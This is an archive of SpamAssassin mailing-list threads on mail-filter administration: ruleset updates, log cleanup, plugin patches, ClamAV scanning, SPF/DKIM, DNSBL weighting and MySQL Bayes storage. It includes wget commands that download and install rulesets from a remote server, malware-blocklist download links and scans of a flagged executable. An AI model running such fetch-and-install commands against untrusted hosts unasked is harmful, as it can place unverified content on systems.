foxhole_all.cdb if it had been classified like that then.  I am not 
getting any reports or finding any problems with FPs.


foxhole_all is just a few dozen(?) lines of rules to tag file types 
within zip/rar/7z/arj/exe files.


Perhaps because you're outright rejecting many of these file types already?

Regards,
Dave



3,110,729 total messages* since March 15th
112,477 spam blocked
2,071 total viruses found
8 Foxhole viruses found

*After MTA rejects based on RBLs and other DNS checks

--
Dave Jones


***UNCHECKED*** Can't locate object method "trim_domain"

2018-01-26 Thread Dave Wreski

Hi, while learning an mbox on a recent 3.4.2 svn:

# sa-learn --spam --progress --mbox junk-012618
 28% [==   ] 5.53 msgs/sec 00m44s LEFT
Use of uninitialized value in lc at
/usr/share/perl5/vendor_perl/Mail/SpamAssassin/RegistryBoundaries.pm line 205.
plugin: eval failed: Can't locate object method "trim_domain" via
package "elo...@netvisio.com" (perhaps you forgot to load
"elo...@netvisio.com"?) at
/usr/share/perl5/vendor_perl/Mail/SpamAssassin/RegistryBoundaries.pm line 230.
 97% [=   ] 1.71 msgs/sec 01m34s DONE

Learned tokens from 162 message(s) (162 message(s) examined)

   227    # keep IPs intact
   228    if ($uri !~ /^\d+\.\d+\.\d+\.\d+$/) {
   229      # get rid of hostname part of domain, understanding delegation
   230      $uri = $self->trim_domain($uri);
   231
   232      # ignore invalid domains
   233      return unless ($self->is_domain_valid($uri));
   234    }

I've searched through bugzilla and haven't found anything similar. Is 
this a known issue? I can provide the message that produced this error 
off-list if necessary.






Re: SA-Update not updating DB

2017-11-17 Thread Dave Wreski



On 11/17/2017 11:39 AM, Jari Fredriksson wrote:




David Jones wrote on 16.11.2017 at 15:22:

REV=1815298
wget http://sa-update.ena.com/${REV}.tar.gz
wget http://sa-update.ena.com/${REV}.tar.gz.sha1
wget http://sa-update.ena.com/${REV}.tar.gz.asc
sa-update -v --install ${REV}.tar.gz


+1 for Sunday. I installed this now to my farm and will keep an eye on it 
through the weekend.


+1 for Sunday here too. We've installed it all around and it's doing great 
so far. Thanks everyone for the amazing work.


Thanks,
Dave


Re: SA-Update not updating DB

2017-11-16 Thread Dave Wreski



REV=1815298
wget http://sa-update.ena.com/${REV}.tar.gz
wget http://sa-update.ena.com/${REV}.tar.gz.sha1
wget http://sa-update.ena.com/${REV}.tar.gz.asc
sa-update -v --install ${REV}.tar.gz

(reload/restart whatever is calling SA -- spamd, amavis-new,
mimedefang,
MailScanner, etc.)

I have applied this ruleset to my platforms and will monitor
scoring/blocking over the next couple of days.
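
The .sha1 and .asc files are fetched alongside the tarball so that it can be verified. For anyone who wants to check the digest by hand as well, here is a minimal Python sketch; it assumes the .sha1 file starts with the hex digest (optionally followed by a file name), which is an assumption about the mirror's file format, and it does not replace the GPG signature check.

```python
import hashlib
from pathlib import Path

def sha1_matches(tarball: Path, sha1_file: Path) -> bool:
    """Compare a file's SHA-1 with the first whitespace-separated field of sha1_file."""
    expected = sha1_file.read_text().split()[0].lower()
    digest = hashlib.sha1()
    with tarball.open("rb") as fh:
        # Read in chunks so large tarballs do not need to fit in memory.
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest() == expected

# Example call (paths are placeholders for the files downloaded above):
#   sha1_matches(Path("1815298.tar.gz"), Path("1815298.tar.gz.sha1"))
```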


Hmm, the file doesn't seem to be able to be found unless of course I
did something incorrectly:

chris@localhost:~/Downloads$ wget http://sa-update.ena.com/${REV}.tar.gz
--2017-11-16 08:51:50--  http://sa-update.ena.com/.tar.gz
Resolving sa-update.ena.com (sa-update.ena.com)... 96.4.1.5, 96.5.1.5
Connecting to sa-update.ena.com (sa-update.ena.com)|96.4.1.5|:80...
connected.
HTTP request sent, awaiting response... 404 Not Found
2017-11-16 08:51:50 ERROR 404: Not Found.


You forgot to set the REV environment variable first. Just copy the text 
including the REV=1815298 and paste on the command-line as root and it 
should work.
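
The 404 follows directly from how the shell expands an unset variable: ${REV} becomes an empty string, so the request goes to /.tar.gz. A tiny Python imitation of that expansion, for illustration only (shell_expand is a made-up helper that handles just the plain ${NAME} form):

```python
import re

def shell_expand(template: str, variables: dict) -> str:
    """Expand ${NAME} like a shell does for plain variables: unset names become ''."""
    return re.sub(r"\$\{(\w+)\}", lambda m: variables.get(m.group(1), ""), template)

URL = "http://sa-update.ena.com/${REV}.tar.gz"
print(shell_expand(URL, {}))                  # REV not set
print(shell_expand(URL, {"REV": "1815298"}))  # REV set first
```

The first line printed matches the URL in the wget output above; the second is the one that was intended.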


Regards,
Dave






Re: Problem with massive log files

2017-04-04 Thread Dave Wreski

Hi,



I've posted the spamfilter.sh file to http://pasted.co/7b794ccd

I don't see anything in there about verbose logging, but there are
two lines in there with a resemblance to your suggestion:

logger -f $SALOG -p mail.notice -t spamfilter <<<"Spam filter piping to SpamAssassin: $SPAMASSASSIN -x -E -s $MAX_MESSAGE_SIZE"

and

logger -s -p mail.notice -t spamfilter <<<"OK.  Piping to sendmail: $SENDMAIL $@"

The second one seems to be after-the-fact, so I think I could modify
the first one.  Should this be cut down to:

$SPAMASSASSIN -x -E -s $MAX_MESSAGE_SIZE

to avoid the logging process?


Yes, you can comment out this line:

logger -f $SALOG -p mail.notice -t spamfilter <<<"Spam filter piping ...

and this one:

logger -s -p mail.notice -t spamfilter <<<"OK.  Piping to sendmail: ...

Basically, the first and last "logger" lines. That's a good start.

Regards,
Dave


Re: Problem with massive log files

2017-04-04 Thread Dave Wreski

Hi,


I thought spamfilter was spamassassin.

Looking through my config files, the postfix master.cf file contains
the line:

flags=Rq user=spamd argv=/usr/bin/spamfilter.sh -oi -f ${sender} ${recipient}

/usr/bin/spamfilter.sh is described in the comments as:


Where did you get the instructions to put this whole system together? 
You mentioned amavisd-new, but this doesn't look to be using amavisd-new 
at all.


Look through the script for something relating to "debug" or "verbose" 
or "info:" or something pertaining to logging and disable it.


In fact, a little googling shows this:

logger <<<"Spam filter piping to SpamAssassin, then to: $SENDMAIL $@"
  ${SPAMASSASSIN} | ${SENDMAIL} "$@"

You should be able to comment that out and instead use the following in 
place:


${SENDMAIL} "$@"


Current log file is up to 165 Gb.


You should look at your logging and/or log rotating system to get this 
under control. I believe that's going to be /etc/logrotate.d/


Regards,
Dave




Kind regards.

Jim.



On 04/04/17 22:41, Dave Wreski wrote:

Hi,


My set up consists of Postfix, Postgrey, Spamassassin, Clam-AV,
Amavis-new and Dovecot.


What is "spamfilter"?

Apr  2 10:31:26 oss2 spamfilter: Sun Oct 16 07:24:13 2016 [16208]
info: spamd:
connection from ip6-localhost [::1]:53930 to port 783, fd 5

What operating system?

Regards,
Dave




Re: Problem with massive log files

2017-04-04 Thread Dave Wreski

Hi,


My set up consists of Postfix, Postgrey, Spamassassin, Clam-AV,
Amavis-new and Dovecot.


What is "spamfilter"?

Apr  2 10:31:26 oss2 spamfilter: Sun Oct 16 07:24:13 2016 [16208] info: 
spamd: connection from ip6-localhost [::1]:53930 to port 783, fd 5


What operating system?

Regards,
Dave



Re: Define new variables in local.cf

2016-11-08 Thread Dave Wreski

Hi,


having the regex into a variable would help maintenance. Something like:

$BankList = "Bank1|Bank2|Bank3|Bank4"

uri     BANKURI   /$BankList/i
score   BANKURI   0.2

body    BANKBODY  /$BankList/i
score   BANKBODY  0.1

is there any way to do this?


You might try something like this:

body    __BANK1     /Bank1/
body    __BANK2     /Bank2/
body    __BANK3     /Bank3/
meta    BANKBODY    (__BANK1 || __BANK2 || __BANK3)
score   BANKBODY    0.1

uri     __BANKURI1  /bank1\.com/
uri     __BANKURI2  /bank2\.com/
uri     __BANKURI3  /bank3\.com/
meta    BANKURI     (__BANKURI1 || __BANKURI2 || __BANKURI3)
score   BANKURI     0.1

If you'd like to be able to use variables, like $BankList, I would 
create a script that writes out the spamassassin cf file to the 
spamassassin rule directory.
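
Such a generator can be very small. A Python sketch, assuming the bank names only contain letters, digits, spaces, dots and hyphens; the rule names and scores come from the question, while render_rules and the output location are made up for the example.

```python
import re

def render_rules(banks, body_score=0.1, uri_score=0.2) -> str:
    """Render BANKBODY/BANKURI rules from one shared list of names."""
    for name in banks:
        # Refuse anything that could break out of the /.../ regexp delimiters.
        if not re.fullmatch(r"[A-Za-z0-9 .-]+", name):
            raise ValueError(f"unsupported characters in {name!r}")
    alternation = "|".join(re.escape(name) for name in banks)
    return "\n".join([
        "# Generated file, do not edit by hand",
        f"body   BANKBODY  /\\b(?:{alternation})\\b/i",
        f"score  BANKBODY  {body_score}",
        f"uri    BANKURI   /(?:{alternation})/i",
        f"score  BANKURI   {uri_score}",
        "",
    ])

print(render_rules(["Bank1", "Bank2", "Bank3"]))
```

Writing the result to a .cf file in the local rules directory and running "spamassassin --lint" afterwards catches syntax mistakes before the rules go live.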


Regards,
Dave


Re: ClamAV.pm Plugin Not Working

2015-11-20 Thread Dave Wreski



clamdscan -c /etc/clamd.d/scan.conf eicar.txt
/home/dan/eicar.txt: lstat() failed: Permission denied. ERROR


It looks to be related to clamdscan performing a chroot() and the files 
you're referencing not being available from within that chroot. Try 
passing the --stream option.


-bash-4.3$ clamdscan /var/tmp/orderlist.exe
/var/tmp/orderlist.exe: lstat() failed: No such file or directory. ERROR

--- SCAN SUMMARY ---
Infected files: 0
Total errors: 1
Time: 0.000 sec (0 m 0 s)
-bash-4.3$ clamdscan /var/tmp/orderlist.exe --stream
/var/tmp/orderlist.exe: PUA.Win32.Packer.SetupExeSection FOUND

--- SCAN SUMMARY ---
Infected files: 1
Time: 0.051 sec (0 m 0 s)
-bash-4.3$ clamdscan /var/tmp/orderlist.exe --fdpass
/var/tmp/orderlist.exe: PUA.Win32.Packer.SetupExeSection FOUND

--- SCAN SUMMARY ---
Infected files: 1
Time: 0.042 sec (0 m 0 s)

Regards,
Dave


Re: SPF and blocking phishing attempts

2015-10-14 Thread Dave Wreski

Hi,

On 10/14/2015 06:08 PM, Dianne Skoll wrote:

On Wed, 14 Oct 2015 17:51:23 -0400
Alex  wrote:


I'd like to make sure incoming mail that appears to be "From:" one of
our internal users has indeed gone through one of the systems
specified in the SPF record, resulting in an SPF_PASS.


Can't be done.  SPF looks at the envelope sender (what end-users know
as the Return-Path:) and not at all at the From: header.


Yes, I realize SPF is only concerned with the envelope-sender. I was 
thinking it would be possible to somehow correlate the SPF_PASS with a 
rule that analyzes the From: header and use that to compare?


Thanks,
Alex




You can do what you're trying to do with DKIM, though, and reject mail
claiming to be from your domain (in the From: header) that has an invalid
or no DKIM signature.

If you can't install DKIM software on your Exchange server, you can use
your Linux box as a smarthost and have the Linux box sign outbound
mail from the Exchange server.

Of course, internal mail won't ever leave the Exchange server and will thus
lack a DKIM signature, but that shouldn't be a problem... just check DKIM
on the MX hosts and not Exchange.

Regards,

Dianne.



Re: Rules needed...

2015-06-27 Thread Dave Wreski

Hi,


blacklist_from *@*.allisonarctictrips.com

spf-pass take responselily


Yes, after it's received, there are a ton of things that could be done
to block it (including my local RBL). I was hoping for something
preventative.



Eh?  I'm afraid I don't get this at all - greylisting and RBL checks in
the MTA before SA even sees it, are the only thing
out there that is even in the realm of preventative measures and you
already know about greylisting.

Are you not aware that once a DATA channel is opened on an SMTP
transaction that you have effectively received it?


You're thinking too hard about it. Yes, of course I was talking about 
before this message, or the dozens like it, were received in the first 
place.



But, putting RBL checks into the MTA is the best way I know to piss off
your users since tag-and-forward is not an option on MTA rbl checking.
That's why we all do our RBL checks in spamassassin.


Look into postscreen and the postscreen_dnsbl_threshold to rank the 
DNSBLs to weight them to prevent any single one from rejecting mail.
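
In main.cf the weights go on postscreen_dnsbl_sites entries as "list*weight", and postscreen blocks once the combined score reaches postscreen_dnsbl_threshold. To illustrate just the arithmetic (this is a sketch, not postscreen's code, and the weights are whatever you choose):

```shell
# Arguments: the threshold, then the weight of each DNSBL that listed the client.
dnsbl_verdict() {
    threshold=$1
    shift
    total=0
    for weight in "$@"; do
        total=$((total + weight))
    done
    # The threshold is an inclusive lower bound for blocking
    if [ "$total" -ge "$threshold" ]; then
        echo "reject (score $total)"
    else
        echo "pass (score $total)"
    fi
}
```

With a threshold of 3, a hit on a single list weighted 1 passes, while hits on lists weighted 2 and 1 together are rejected, so no single low-weight list can reject mail on its own.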


Regards,
Dave


Re: Rules needed...

2015-06-26 Thread Dave Wreski



On 06/26/2015 12:45 PM, Benny Pedersen wrote:

Alex Regan skrev den 2015-06-26 18:33:


http://pastebin.com/FzUkEvRp


blacklist_from *@*.allisonarctictrips.com

spf-pass take responselily


Yes, after it's received, there are a ton of things that could be done 
to block it (including my local RBL). I was hoping for something 
preventative.


Thanks,
Alex



Re: PerMsgStatus Util warnings

2015-05-15 Thread Dave Wreski

Hi,


$self->{main}->{registryboundaries}->uri_to_domain($fubar);


This appears to fix DecodeShortURLs.pm

--- DecodeShortURLs.pm.orig 2015-05-15 11:51:44.688835663 -0400
+++ DecodeShortURLs.pm  2015-05-15 11:39:35.020499066 -0400
@@ -486,7 +486,8 @@
  [Mail::SpamAssassin::Util::uri_list_canonify (undef, $uri)];

foreach (@{$info->{cleaned}}) {
-my ($dom, $host) = Mail::SpamAssassin::Util::uri_to_domain($_);
+my ($dom, $host) =
$info->{main}->{registryboundaries}->uri_to_domain($_);

  if ($dom && !$info->{domains}->{$dom}) {
# 3.4 compatibility as per Marc Martinec



For reference here too. Here's a working patch. Do not modify code at
random.  :-)


Thank you for posting the complete patch this time :-)

Alex




--- DecodeShortURLs.pm.orig 2015-05-15 19:19:07.0 +0300
+++ DecodeShortURLs.pm  2015-05-15 19:20:19.0 +0300
@@ -446,7 +446,7 @@

# At this point we have a new URL in $response
$pms->got_hit('HAS_SHORT_URL');
-  _add_uri_detail_list($pms, $location);
+  $self->_add_uri_detail_list($pms, $location);

# Set chained here otherwise we might mark a disabled page or
# redirect back to the same host as chaining incorrectly.
@@ -458,7 +458,7 @@
  my($host) = ($short_url =~ /^(https?:\/\/\S+)\//);
  $location = "$host/$location";
  dbg("Looks like a local redirection: $short_url => $location");
-_add_uri_detail_list($pms, $location);
+$self->_add_uri_detail_list($pms, $location);
  return $location;
}

@@ -490,7 +490,7 @@
  # Beware.  Code copied from PerMsgStatus get_uri_detail_list().
  # Stolen from GUDO.pm
  sub _add_uri_detail_list {
-  my ($pms, $uri) = @_;
+  my ($self, $pms, $uri) = @_;
my $info;

# Cache of text parsed URIs, as previously used by get_uri_detail_list().
@@ -502,7 +502,7 @@
  [Mail::SpamAssassin::Util::uri_list_canonify (undef, $uri)];

foreach (@{$info->{cleaned}}) {
-my ($dom, $host) = Mail::SpamAssassin::Util::uri_to_domain($_);
+my ($dom, $host) = $self->{main}->{registryboundaries}->uri_to_domain($_);

  if ($dom && !$info->{domains}->{$dom}) {
# 3.4 compatibility as per Marc Martinec



Re: Spamassassin not catching spam (Follow-up)

2015-03-25 Thread Dave Wreski

Hi,


RH I don't know the UK laws, but in Germany it's certainly not allowed,
RH because it's legally classified the same as a postman saying "meh, I
RH won't walk upstairs today" and throwing the letter away.

RH If you claim to provide reliable mail services, it should be obvious
RH that discarding instead of rejecting, so that neither party can take
RH notice in case of false positives, is not that smart.

Better go tell MS, as that's exactly what Hotmail and Live do.


because others do wrong is not a good justification


I hoped I could ask for a little more of an explanation.

I'm willing to rely on RBLs and postscreen to make outright reject 
decisions, but I'm not sure I want spamassassin/amavisd doing that. 
Silently quarantining viruses and spam is how it's been done here for a 
while.


So this method eliminates the content_filter configuration in postfix, 
where the messages are queued.


I can see this new method being suitable for smaller networks, but 
without any queuing capability, how does it scale?


Also, if there is even a temporary interruption in amavis' ability to 
operate, mail will be rejected.


Do large scale operators implement this proxy filter approach, and if 
so, aren't there any problems with processing times?


It seems the real advantage to doing it this way is the ability to 
quickly reject mail not already rejected by zen/postscreen/etc. Is that 
really such a big benefit?


And not even all spam would be rejected - only those you felt were over 
a predetermined threshold, correct? Why not just quarantine it all, 
giving the user the ability to determine if they want to go looking for it?


Thanks,
Alex


Re: URLs with non-ASCII chars

2015-02-13 Thread Dave Wreski



On 02/13/2015 05:29 PM, Dave Pooser wrote:

On 2/13/15, 4:27 PM, Dave Wreski dwre...@guardiandigital.com wrote:


I thought I would send this on to you instead of broadcasting it.


You thought wrong :-)



Yeah, thanks

One too many emails after reading spam for the last twelve hours

dave


URLs with non-ASCII chars

2015-02-13 Thread Dave Wreski

Hi John,

I thought I would send this on to you instead of broadcasting it.

I just received an email with an odd URL. It contained what appears to 
be a non-ASCII character simulating a period, or at least one that is 
not part of the standard set.


http://pastebin.com/x6TGNpD7

<a href=3D"http://harvarddetails=E3=80=82pw" target=3D"_blank">Click

Is this a new method of obfuscation or is there a potential rule here?
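
For reference, the quoted-printable sequence =E3=80=82 is the UTF-8 encoding of U+3002 (IDEOGRAPHIC FULL STOP). A quick way to flag a decoded hostname that contains such bytes, sketched here as a hypothetical helper and not as an SA rule:

```shell
# Prints the number of bytes outside the 7-bit ASCII range in the argument.
non_ascii_bytes() {
    # Delete every byte from 0x00 to 0x7F and count what remains
    count=$(printf '%s' "$1" | LC_ALL=C tr -d '\000-\177' | wc -c)
    echo $((count))
}
```

A plain hostname gives 0; the decoded hostname from the sample above gives 3, one for each byte of the fake period.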

Thanks,
Dave


Re: spamassassin 3.4.0 spec file for rhel4 rhel5 rhel6 and compatible os's

2014-02-14 Thread Dave Wreski
/spamassassin.XX) || exit 1
cp /etc/sysconfig/spamassassin $TMPFILE
perl -p -i -e 's/([\s]-\w+)a/$1/ ; s/([\s]-)a(\w+)/$1$2/ ; s/([\s])-a\b/$1/' $TMPFILE
perl -p -i -e 's/ --auto-whitelist//' $TMPFILE
# replace /etc/sysconfig/spamassassin only if it actually changed
cmp /etc/sysconfig/spamassassin $TMPFILE || cp $TMPFILE /etc/sysconfig/spamassassin
rm $TMPFILE

if [ -f /etc/spamassassin.cf ]; then
%{__mv} /etc/spamassassin.cf /etc/mail/spamassassin/migrated.cf
fi
if [ -f /etc/mail/spamassassin.cf ]; then
%{__mv} /etc/mail/spamassassin.cf /etc/mail/spamassassin/migrated.cf
fi

%postun
%if %{use_systemd} == 0
if [ $1 -ge 1 ]; then
/sbin/service spamassassin condrestart > /dev/null 2>&1
fi
exit 0
%endif

%if %{use_systemd}
%if 0%{?fedora} > 17
%systemd_postun spamassassin.service
%else
/bin/systemctl daemon-reload >/dev/null 2>&1 || :
if [ $1 -ge 1 ] ; then
# Package upgrade, not uninstall
/bin/systemctl try-restart spamassassin.service >/dev/null 2>&1 || :
fi
%endif
%endif

%preun
%if %{use_systemd} == 0
if [ $1 = 0 ] ; then
/sbin/service spamassassin stop >/dev/null 2>&1
/sbin/chkconfig --del spamassassin
fi
exit 0
%endif

%if %{use_systemd}
%if 0%{?fedora} > 17
%systemd_preun spamassassin.service
%else
if [ $1 -eq 0 ] ; then
# Package removal, not upgrade
/bin/systemctl --no-reload disable spamassassin.service > /dev/null 2>&1 || :
/bin/systemctl stop spamassassin.service > /dev/null 2>&1 || :
fi
%endif
%endif

%if %{use_systemd}
%triggerun -- spamassassin < 3.3.2-2
%{_bindir}/systemd-sysv-convert --save spamassassin >/dev/null 2>&1 ||:

# Run these because the SysV package being removed won't do them
/sbin/chkconfig --del spamassassin >/dev/null 2>&1 || :
/bin/systemctl try-restart spamassassin.service >/dev/null 2>&1 || :
%endif

%changelog
* Wed Feb 12 2014 Dave Wreski dwre...@guardiandigital.com - 3.4.0-20
- Update to production release
- Build for fedora-17

* Wed Jan 08 2014 Dave Wreski dwre...@guardiandigital.com - 3.4.0-19
- Update SVN
- Build for fedora-17

* Tue May 14 2013 Dave Wreski dwre...@guardiandigital.com - 3.4.0-18
- Update SVN

* Sat Apr 27 2013 Dave Wreski dwre...@guardiandigital.com - 3.4.0-17
- Remove RabinKarpBody.pm

* Fri Apr 26 2013 Dave Wreski dwre...@guardiandigital.com - 3.4.0-16
- Rebuild for fedora 17

* Fri Feb 15 2013 Fedora Release Engineering rel-...@lists.fedoraproject.org - 3.3.2-15
- Rebuilt for https://fedoraproject.org/wiki/Fedora_19_Mass_Rebuild

* Thu Nov 15 2012 Kevin Fenzi ke...@scrye.com 3.3.2-14
- Fix incorrect pgrep path. Fixes bug #875844

* Sat Aug 25 2012 Kevin Fenzi ke...@scrye.com 3.3.2-13
- Add systemd macros for presets. Fixes bug #850320

* Fri Aug 03 2012 Kevin Fenzi ke...@scrye.com - 3.3.2-12
- Fix sa-update not detecting spamd running. Fixes bug #755644
- Add restart=always to systemd file to work around upstream bug. Bug #812359

* Sat Jul 21 2012 Fedora Release Engineering rel-...@lists.fedoraproject.org - 3.3.2-11
- Rebuilt for https://fedoraproject.org/wiki/Fedora_18_Mass_Rebuild

* Wed Jun 13 2012 Petr Pisar ppi...@redhat.com - 3.3.2-10
- Perl 5.16 rebuild

* Thu Jan 19 2012 Kevin Fenzi ke...@scrye.com - 3.3.2-9
- Fix unit file to write pid correctly. Fixes bug #783108

* Sat Jan 14 2012 Fedora Release Engineering rel-...@lists.fedoraproject.org - 3.3.2-8
- Rebuilt for https://fedoraproject.org/wiki/Fedora_17_Mass_Rebuild

* Mon Sep 12 2011 Nick Bebout n...@fedoraproject.org - 3.3.2-7
- Use sysvinit on F15, not systemd

* Thu Sep 08 2011 Nick Bebout n...@fedoraproject.org - 3.3.2-6
- Don't install sysvinit script if using systemd

* Wed Sep 07 2011 Jesse Keating jkeat...@redhat.com - 3.3.2-5
- Add details for RHEL 7

* Sat Aug 13 2011 Nick Bebout n...@fedoraproject.org - 3.3.2-4
- Build with systemd unit file for f16 and f17

* Thu Jul 21 2011 Petr Sabata con...@redhat.com - 3.3.2-3
- Perl mass rebuild

* Tue Jul 19 2011 Petr Sabata con...@redhat.com - 3.3.2-2
- Perl mass rebuild

* Mon Jun 6 2011 Warren Togami war...@togami.com - 3.3.2-1
- 3.3.2

* Mon May 30 2011 Warren Togami war...@togami.com - 3.3.2-0.8.rc2
- 3.3.2-rc2

* Mon May 16 2011 Warren Togami war...@togami.com - 3.3.2-0.7.rc1
- 3.3.2-rc1

* Sun Feb 27 2011 Ville Skyttä ville.sky...@iki.fi - 3.3.2-0.6.svn1071394
- Own /etc/mail dir (#645035).

* Wed Feb 16 2011 Nick Bebout n...@fedoraproject.org - 3.3.2-0.5.svn1071394
- Oops, I left off svn in the Release of 3.3.2-0.4.svn1071394

* Wed Feb 16 2011 Nick Bebout n...@fedoraproject.org - 3.3.2-0.4.svn1071394
- replace @@VERSION@@ with current saversion
- restart spampd after sa-update cronjob runs
- update to svn1071394

* Wed Feb 09 2011 Fedora Release Engineering rel-...@lists.fedoraproject.org - 3.3.2-0.3.svn1027144
- Rebuilt for https://fedoraproject.org/wiki/Fedora_15_Mass_Rebuild

* Fri Oct 29 2010 Kevin Fenzi ke...@tummy.com - 3.3.2-0.2.svn1027144
- Fix sa-update sysconfig script line wrapping

* Mon Oct 25 2010 Nick Bebout n...@fedoraproject.org - 3.3.2-0.1.svn1027144
- Update to 3.3.2 - svn1027144 to solve

Re: SOLVED Re: malware.blocklist.cf : www.malware.com.br unavailable

2011-08-09 Thread Dave Wreski

Hi,


 I noticed that the site that provided the malware.blocklist.cf  has
been unavailable since at least the 8th of August.

URL for the file was on http://www.malware.com.br/cgi/submit?action=list_sa

The FQDN no longer resolves to an address.  I have tried our local DNS,
Level3 4.2.2.2 and Google 8.8.4.4. Its not there :(

Does anyone know why they are unavailable?  (Or even, is the site
available to you?)

Regards, S

Finally found that they changed their name a few months ago, and finally
they turned off the .com.br site.

http://www.malwarepatrol.net/

wget "http://www.malwarepatrol.net//cgi/submit?action=list_sa"


Aren't these the same rules that are already present in the sanesecurity 
clamav db?


Thanks,
Dave



Re: SOLVED Re: malware.blocklist.cf : www.malware.com.br unavailable

2011-08-09 Thread Dave Wreski

Hi,


Finally found that they changed their name a few months ago, and
finally
they turned off the .com.br site.

http://www.malwarepatrol.net/

wget "http://www.malwarepatrol.net//cgi/submit?action=list_sa"


Aren't these the same rules that are already present in the sanesecurity
clamav db?


Sanesecurity does not distribute the MalwarePatrol blocklist, this
signature file needs to be downloaded directly from their site.


Yes, maybe I wasn't clear. I meant that I thought the clamav version 
that is downloaded from their site (ala clamav-unofficial-sigs.sh) 
contains the same rules as this version that is downloaded for SA, correct?


Thanks again,
Dave


Re: Lots of Chinese Spam with attachments

2011-08-05 Thread Dave Wreski



Here are the typical hits I get on a message:

X-Spam-Status: No, score=3.4 required=5.0 tests=BODY_8BITS,HTML_MESSAGE,
MIME_HTML_ONLY,RCVD_IN_BRBL_LASTEXT,RP_MATCHES_RCVD,SPF_PASS 
autolearn=no
version=3.3.1

...

X-Spam-Status: No, score=4.6 required=5.0 tests=BODY_8BITS,HTML_MESSAGE,
MIME_HTML_ONLY,RP_MATCHES_RCVD,SPF_PASS,UNWANTED_LANGUAGE_BODY 
autolearn=no
version=3.3.1


Bayes is missing from both of these. Are you not using bayes?

Post a sample to pastebin.com then follow up here with a link so we can 
investigate.


Regards,
Dave



Re: Migrating bayes to mysql fails with parsing errors

2011-06-23 Thread Dave Wreski

Hi,


since so many have problems i share my mysql schemas :=)
`token` binary(5) NOT NULL,


Yes, the binary or varbinary is the key to a solution here.
Mucking with utf-8 vs latin-1 is just covering but not solving
the most glaring problem here, namely that a token must not be
associated with any character set, as it does not obey any
such rules, nor should it be treated case-insensitively
(as char is, which is possibly a reason for more than two
record changes as reported by Dave). Will take a closer look...


I changed the Type=MyISAM at the end of each CREATE statement in the 
original schema and replaced it with the following from Benny's schema:


ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_bin;

It's now working, but is excruciatingly slow. Is this also just covering 
the problem, or will this be a usable solution when it finally finishes?


Is there a difference whether I learn as MyISAM then convert to InnoDB 
after it finishes? I could train it using original spam/ham, but I fear 
it will be equally as slow and obviously a more difficult process to 
hand-scan for corpus again.


Thanks,
Dave



Re: Migrating bayes to mysql fails with parsing errors

2011-06-23 Thread Dave Wreski

Hi,


ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_bin;

It's now working, but is excruciatingly slow. Is this also just covering
the problem, or will this be a usable solution when it finally finishes?


Just being curious: are you using

bayes_store_module Mail::SpamAssassin::BayesStore::MySQL
or
bayes_store_module Mail::SpamAssassin::BayesStore::SQL

the latter is VERY slow with MySQL


Yes, I'm using MySQL. It looks like I have some performance tuning to 
do. Michael's suggestion about a sample my.cnf was a good one. Now I have 
to wait until it finishes before doing any of that, though.


Thanks again,
Dave




Re: Migrating bayes to mysql fails with parsing errors

2011-06-23 Thread Dave Wreski

Hi,


dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0
dbg: bayes: _put_token: Updated an unexpected number of rows.


I have opened three bug entries, the first one is directly in response
to this problem report and brings a fix:

[Bug 6624] BayesStore/MySQL.pm fails to update tokens due to
MySQL server bug (wrong count of rows affected)
   https://issues.apache.org/SpamAssassin/show_bug.cgi?id=6624

[Bug 6625] Bayes SQL schema treats bayes_token.token as char
instead of binary, fails chset checks
   https://issues.apache.org/SpamAssassin/show_bug.cgi?id=6625

[Bug 6626] Newer MySQL chokes on TYPE=MyISAM syntax
   https://issues.apache.org/SpamAssassin/show_bug.cgi?id=6626


Shouldn't one of these patches include the change to InnoDB in the 
schema itself instead of just a recommendation in the documentation?


Combined with the other patch, maybe Benny's should be the new preferred 
schema?



Dave, could you please revert my previous patch and apply instead
the patch attached to Bug  6624 (applicable to 3.3, or just install trunk).



Also consider the tiny fix to the schema as suggested by Benny Pedersen
and found as an attachment to Bug 6625. This should avoid a
problem if your SQL server defaults to UTF-8 or other character set
with stricter checking than a plain Latin-1.


Okay, both patches applied, and confirmed that it fixes the problem.

Thanks,
Dave


Re: Migrating bayes to mysql fails with parsing errors

2011-06-21 Thread Dave Wreski

Hi,


dbg: bayes: error inserting token for line: t 1 0 1308114254
   4fd2b3f2f0 dbg: bayes: _put_token: Updated an unexpected number
   of rows. [repeats ...]


Which version of MySQL?

Did you remember to replace TYPE=MyISAM with TYPE=InnoDB in the
schema (according to README.bayes) if you are using the recommended
Mail::SpamAssassin::BayesStore::MySQL as the bayes_store_module?

Please try the following patch (against 3.3.2), at least it should provide
more informative diagnostics:


[snip..]

I faced the same problem today. In my case, MySQL was configured to
use utf8 by default:

   # my.cnf

   [client]
   default-character-set=utf8

   [mysqld]
   character-set-server=utf8
   collation-server=utf8_unicode_ci
   init_connect='set collation_connection = utf8_unicode_ci;'

After commenting out the utf8 definitions and reverting back to latin1
sa-learn --restore worked fine.


I'm using mysql version:

# mysql --version
mysql  Ver 14.14 Distrib 5.1.56, for redhat-linux-gnu (x86_64) using 
readline 5.1


Is there a difference between InnoDB and MyISAM in terms of training, or 
can that change be made after the initial training? Why is it so much 
slower using InnoDB during training?


It looks like that may be my problem too. This is the result with your 
patch:


dbg: bayes: database connection established
dbg: bayes: found bayes db version 3
dbg: bayes: Using userid: 2
dbg: bayes: database connection established
dbg: bayes: found bayes db version 3
dbg: bayes: using userid: 3
dbg: bayes: _put_token: Updated an unexpected number of rows: 3, id: 3, 
token: 7�OR�

dbg: bayes: error inserting token for line: t 0 1 1308332646 37fc4f52eb
dbg: bayes: _put_token: Updated an unexpected number of rows: 3, id: 3, 
token: Y

dbg: bayes: error inserting token for line: t 0 2 1308070890 d2eec4f659

I'll try the suggested my.cnf changes and restart the process.

Thanks,
Dave


Re: Migrating bayes to mysql fails with parsing errors

2011-06-21 Thread Dave Wreski

Hi,


It looks like that may be my problem too. This is the result with your
patch:

dbg: bayes: database connection established
dbg: bayes: found bayes db version 3
dbg: bayes: Using userid: 2
dbg: bayes: database connection established
dbg: bayes: found bayes db version 3
dbg: bayes: using userid: 3
dbg: bayes: _put_token: Updated an unexpected number of rows: 3, id: 3,
token: 7�OR�
dbg: bayes: error inserting token for line: t 0 1 1308332646 37fc4f52eb
dbg: bayes: _put_token: Updated an unexpected number of rows: 3, id: 3,
token: Y
